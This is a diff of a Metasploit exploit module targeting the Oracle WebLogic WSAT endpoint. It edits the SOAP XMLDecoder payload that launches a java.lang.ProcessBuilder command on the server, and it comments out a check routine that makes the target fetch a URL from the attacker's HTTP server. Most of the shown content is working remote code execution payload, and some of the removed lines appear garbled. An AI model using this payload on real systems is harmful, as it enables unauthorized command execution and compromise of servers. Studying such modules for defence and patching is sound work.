@@ -7,7 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
77 Rank = ExcellentRanking
88
99 include Msf ::Exploit ::Remote ::HttpClient
10- include Msf ::Exploit ::Remote ::HttpServer
10+ # include Msf::Exploit::Remote::HttpServer
1111
1212 def initialize ( info = { } )
1313 super (
@@ -55,7 +55,7 @@ def initialize(info = {})
5555 OptString . new ( 'TARGETURI' , [ true , 'The base path to the WebLogic WSAT endpoint' , '/wls-wsat/CoordinatorPortType' ] ) ,
5656 OptPort . new ( 'RPORT' , [ true , "The remote port that the WebLogic WSAT endpoint listens on" , 7001 ] ) ,
5757 OptFloat . new ( 'TIMEOUT' , [ true , "The timeout value of requests to RHOST" , 20.0 ] ) ,
58- OptInt . new ( 'HTTP_DELAY' , [ true , 'Time that the HTTP Server will wait for the check payload' , 10 ] )
58+ # OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])
5959 ] )
6060 end
6161
@@ -85,7 +85,7 @@ def exploit_process_builder_payload
8585 <soapenv:Header>
8686 <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
8787 <java>
88- <object class="java.lang.ProcessBuilder">
88+ <void class="java.lang.ProcessBuilder">
8989 <array class="java.lang.String" length="3" >
9090 <void index="0">
9191 <string>#{ cmd_base }
@@ -98,7 +98,7 @@ def exploit_process_builder_payload
9898 </void>
9999 </array>
100100 <void method="start"/>
101- </object >
101+ </void >
102102 </java>
103103 </work:WorkContext>
104104 </soapenv:Header>
@@ -115,12 +115,12 @@ def check_process_builder_payload
115115 <soapenv:Header>
116116 <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
117117 <java version="1.8" class="java.beans.XMLDecoder">
118- <object id="url" class="java.net.URL">
118+ <void id="url" class="java.net.URL">
119119 <string>#{ get_uri . encode ( xml : :text ) }
120- </object >
121- <object idref="url">
120+ </void >
121+ <void idref="url">
122122 <void id="stream" method = "openStream" />
123- </object >
123+ </void >
124124 </java>
125125 </work:WorkContext>
126126 </soapenv:Header>
@@ -145,32 +145,35 @@ def on_request_uri(cli, request)
145145 # the response from. This is based off of the exploit technique from
146146 # exploits/windows/novell/netiq_pum_eval.rb
147147 #
148- def check
149- start_service
150-
151- print_status ( 'Sending the check payload...' )
152- res = send_request_cgi ( {
153- 'method' => 'POST' ,
154- 'uri' => normalize_uri ( target_uri . path ) ,
155- 'data' => check_process_builder_payload ,
156- 'ctype' => 'text/xml;charset=UTF-8'
157- } , datastore [ 'TIMEOUT' ] )
158-
159- print_status ( "Waiting #{ datastore [ 'HTTP_DELAY' ] } )
160-
161- waited = 0
162- until @received_request
163- sleep 1
164- waited += 1
165- if waited > datastore [ 'HTTP_DELAY' ]
166- stop_service
167- return Exploit ::CheckCode ::Safe
168- end
169- end
170-
171- stop_service
172- return Exploit ::CheckCode ::Vulnerable
173- end
148+ # This doesn't work as is because MSF cannot mix HttpServer and HttpClient
149+ # at the time of authoring this
150+ #
151+ # def check
152+ # start_service
153+ #
154+ # print_status('Sending the check payload...')
155+ # res = send_request_cgi({
156+ # 'method' => 'POST',
157+ # 'uri' => normalize_uri(target_uri.path),
158+ # 'data' => check_process_builder_payload,
159+ # 'ctype' => 'text/xml;charset=UTF-8'
160+ # }, datastore['TIMEOUT'])
161+ #
162+ # print_status("Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...")
163+ #
164+ # waited = 0
165+ # until @received_request
166+ # sleep 1
167+ # waited += 1
168+ # if waited > datastore['HTTP_DELAY']
169+ # stop_service
170+ # return Exploit::CheckCode::Safe
171+ # end
172+ # end
173+ #
174+ # stop_service
175+ # return Exploit::CheckCode::Vulnerable
176+ # end
174177
175178 #
176179 # The exploit method connects to the remote service and sends the specified payload
0 commit comments